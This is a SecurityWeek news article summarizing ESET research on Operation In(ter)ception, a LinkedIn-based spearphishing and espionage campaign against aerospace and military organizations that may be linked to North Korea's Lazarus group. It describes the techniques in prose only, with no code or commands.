Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Cybercrime

Aerospace, Military Hit in Ongoing Espionage Campaign Linked to North Korea

Organizations in the aerospace and military sectors were compromised in a highly targeted cyber-espionage campaign that shows a possible link to North Korean hackers, ESET reveals.

Organizations in the aerospace and military sectors were compromised in a highly targeted cyber-espionage campaign that shows a possible link to North Korean hackers, ESET reveals.

Active since September 2019 and still ongoing, Operation In(ter)ception hit companies in Europe and the Middle East through fake accounts on LinkedIn that posted bogus job offers. The attacks appear to have been focused mainly on espionage, but a business email compromise attempt was also discovered.

The threat actor behind these attacks remains unknown, but ESET believes it could be linked to the infamous North Korean state-sponsored group Lazarus, based on targeting, the use of fake LinkedIn accounts, development tools, and anti-analysis methods. Furthermore, one of the observed stage 1 malware variants carried a sample of Lazarus-attributed NukeSped.

“The attacks we investigated showed all the signs of espionage, with several hints suggesting a possible link to the infamous Lazarus group. However, neither the malware analysis nor the investigation allowed us to gain insight into what files the attackers were aiming for,” ESET researcher Dominik Breitenbacher comments.

Fake LinkedIn accounts claiming to be HR representatives at well-known aerospace and defense companies such as U.S.-based Collins Aerospace (formerly Rockwell Collins) and General Dynamics were created for each of the targeted organizations.

Attractive bogus jobs were offered and, once the victim’s attention was captured, the attackers sent over password-protected archives containing LNK files that started a command prompt to open a decoy PDF in the browser.

Unbeknown to the victim, the command prompt created a new folder on the machine, copied the WMIC.exe utility to it, and set up persistence for it via a scheduled task. WMIC was used to interpret remote XSL scripts, certutil for payload decoding, and rundll32/regsvr32 for malware execution.

The attackers used a multitude of malicious tools, including a custom downloader (stage 1) and a backdoor (stage 2), a modified version of PowerShell, custom DLL loaders, a beacon DLL, and a custom build of the open-source command-line client for Dropbox dbxcli.

Advertisement. Scroll to continue reading.

PowerShell commands were used for reconnaissance, such as querying Active Directory for a list of employees, including administrator accounts (which were later brute-forced).

ESET’s security researchers also discovered that the threat actor put a lot of effort into remaining undetected: files and folders were named so that they would seem legitimate, malware components were digitally signed, the stage 1 downloader was recompiled multiple times, and anti-analysis techniques were implemented in the malware.

The Dropbox client dbxcli was used for data exfiltration, but the researchers could not gain insight into the files that the attackers were after, but believe that they might have targeted technical and business-related information.

As part of one attack, the adversary also attempted to perform business email compromise, by tricking a victim company’s customer into sending the payment for a pending invoice to an attacker-controlled account. The attack, however, was unsuccessful, as the customer became suspicious.

WMI commands were likely used for lateral movement within the compromised environments, but the attackers removed deployed files from the hacked computers after moving to new systems.

“Our research into Operation In(ter)ception shows again how effective spearphishing can be for compromising a target of interest. […] Unafraid of direct contact, the attackers chatted with the victims to convince them to open malicious files. Once they succeeded, they had their initial foothold inside the victim companies,” ESET notes.

Related: U.S. Cyber Command Shares More North Korean Malware Variants

Related: North Korean Hackers Continue to Target Cryptocurrency Exchanges

Related: Europol on Methodology Behind Successful Spear Phishing Attacks

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join SecurityWeek and Hitachi Vantara for this this webinar to gain valuable insights and actionable steps to enhance your organization's data security and resilience.

Register

Event: ICS Cybersecurity Conference

The leading industrial cybersecurity conference for Operations, Control Systems and IT/OT Security professionals to connect on SCADA, DCS PLC and field controller cybersecurity.

Register

People on the Move

Defense contractor Nightwing has appointed Tricia Fitzmaurice as Chief Growth Officer.

Xage Security has appointed Russell McGuire as CRO and Ashraf Daqqa as VP of the META region.

Solana co-founder Stephen Akridge has been appointed the CEO of data protection firm Cyber Grant.

More People On The Move

Expert Insights

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest cybersecurity news, threats, and expert insights. Unsubscribe at any time.